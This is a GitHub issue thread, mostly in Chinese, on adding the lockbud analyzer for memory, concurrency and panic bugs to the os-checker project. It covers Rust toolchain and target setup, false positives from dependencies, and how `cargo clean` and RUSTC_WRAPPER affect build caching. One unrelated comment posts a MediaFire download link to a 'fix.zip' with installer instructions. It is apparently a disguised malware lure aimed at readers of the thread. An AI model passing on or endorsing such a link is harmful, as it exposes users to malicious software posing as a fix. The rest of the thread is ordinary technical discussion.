### ISSUE TITLE
使用 `cargo lockbud` 检查内存、并发错误和 panics

### ISSUE THREAD

**Issue by zjp-CN** [os-checker/os-checker#34]
lockbud 仓库地址：https://github.com/BurtonQin/lockbud

一些障碍：
* 安装障碍：lockbud 依赖于固定的 Rust 版本，而目标代码库依赖于 target triple，这意味着需要
  1. 安装 lockbud 所需的 Rust 工具链
  2. 安装所有代码库所需的 targets：这意味着必须在开始运行所有 lockbud 检查前提前搜集所有 targets 信息，单独的 package 所需的 targets 已经基本实现了（ https://github.com/os-checker/os-checker/issues/26  ），因此需要稍微调整 os-checker 代码，提前输出这个列表给 CI （输出 targets 已经完成 https://github.com/os-checker/os-checker/issues/31#issuecomment-2311481561 ）

```console
rustup toolchain add nightly-2024-05-21 --profile minimal -c rust-src,rustc-dev,llvm-tools-preview \
  --target riscv64gc-unknown-none-elf,...
```

* 运行障碍：正如所有检查工具会面临的障碍，编译环境和编译条件决定了如何编译和编译哪些代码，因此在没有明确的编译或者检查命令情况下，有可能出现各种因为无法编译而导致的误报。
 
但一个最简单的运行命令为：

```console
cargo +nightly-2024-05-21 lockbud -k all
```

这会带来一些问题：
1. 它会报告依赖项的检查结果，os-checker 如何处理这些依赖项的检查结果？
背景：据 lockbud 自己的文档，它明确说了
> For now, when checking your project, please ignore the bug reports originating from the standard library and common dependencies (especially the memory detectors), as they are mostly false positives.
> 翻译：目前，在检查你的项目时，请忽略来自标准库和常见依赖项（尤其是内存检测器）的错误报告，因为它们大多是误报。

因此，如果忽略依赖项的检查结果，运行命令应该至少为

```console
# only detect [mycrate1, mycrate2]
cargo +nightly-2024-05-21 lockbud -k all -l mycrate1,mycrate2
# skip detecting [mycrate1, mycrate2]
cargo +nightly-2024-05-21 lockbud -k all -b -l mycrate1,mycrate2
```

2. 【已解决】~~貌似它目前无法处理 target。~~ 我已提交 PR 修复了 https://github.com/BurtonQin/lockbud/pull/64

3. 【已解决】作为第 2 点的延申：需要明确 lockbud 与哪些 cargo 参数交互和不交互，也就是 `cargo lockbud` 在 workspace/target/features/RUSTFLAGS/buld.rs 等等维度上的行为。

答：我已确认 lockbud 支持命令行的环境变量和 cargo build 支持的参数。

4. 如果在第 2 点上，lockbud （或者将来任何检查工具）指定不合适的 target 应该编译失败，那么 os-checker 应该报告这个编译失败的错误吗？我们已经看到 os-checker 在不恰当的 targets 情况下报告了上千个误报 :（  我认为 os-checker 应该报告这些”无聊的“误报，即使这些错误需要重复 1 × N 个错误指定的 targets × M 个相关的检查工具 次。因为它属于 os-checker 可解决的问题：只需要明确指定这个 package 的检查命令即可（要么在当前我们控制的 WebUI 的配置文件中，要么在将来支持的目标仓库自己的配置文件中）
    <img src="https://github.com/user-attachments/assets/ed33eacb-c0b4-4e63-b746-f0eac5eb0b86" height="200px"/>

5. 【待观察】 lockbud 依赖于 `cargo clean`，这破坏了 cargo 缓存，意味着检查时间可能大幅增加。我已经向 lockbud 仓库询问为什么需要 `cargo clean` （ https://github.com/BurtonQin/lockbud/issues/63 ）。有一些方式可以解决这个”不太紧急的问题“：
    * 如果破坏缓存是必要的，那么需要指定 --target-dir 到临时目录，避免破坏其他检查工具使用已有的 cargo 缓存。可是 lockbud 支持这个参数的交互吗... 其他检查工具万一也必须破坏缓存呢...
    * 如果破坏缓存不是必要的，那么可以修复 lockbud 代码解决这个问题
    * 或者维持现状，破坏缓存，重新从头编译，代价仅仅是增加数倍检查时间（目前由于支持多架构检查，原来只需要 4 分钟的时间，已经增加到了 10 分钟，可以预见，破坏缓存会让这个情况更加糟糕）

答a：lockbud 需要 cargo clean 的原因是增量构建不编译未改动的代码，此时 lockbud 无法获取 MIR，但 os-checker 不改动代码，所以我们在第一次 build 时可直接获得 lockbud 的检查结果，无需 cargo clean。

答b：不过，对于多架构，如果在 lockbud 之前有 build，那么可能还是会碰到增量构建的问题。

答c：cargo-lockbud 设置了 RUSTC_WRAPPER=lockbud，那么这无法再使用 RUSTC_WRAPPER=sccache 进行缓存，这导致使用 lockbud 或者类似的静态工具，依然会严重延长编译和检查时间。

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by zjp-CN** [comment]
目前 lockbud 的输出是日志形式的，无法统计问题个数，也不好展示结果：
![截图_20240829115449](https://github.com/user-attachments/assets/0d437946-514e-4398-8424-be5c3b1d8bdc)


对比 clippy 的结果：
![截图_20240829120742](https://github.com/user-attachments/assets/15f96fe6-392a-4365-9f77-d3417bb3f609)

一个很好的诊断报告库，可以达到和 rustc 发出的错误报告一样的效果：
https://github.com/zkat/miette
![image](https://github.com/user-attachments/assets/5841e4a3-1fa5-423f-9419-11bfb1b3270c)

**Comment by zjp-CN** [comment]
已初步完成。虽然它暂时无良好的解析格式，如果以后它支持，则新开 issue。
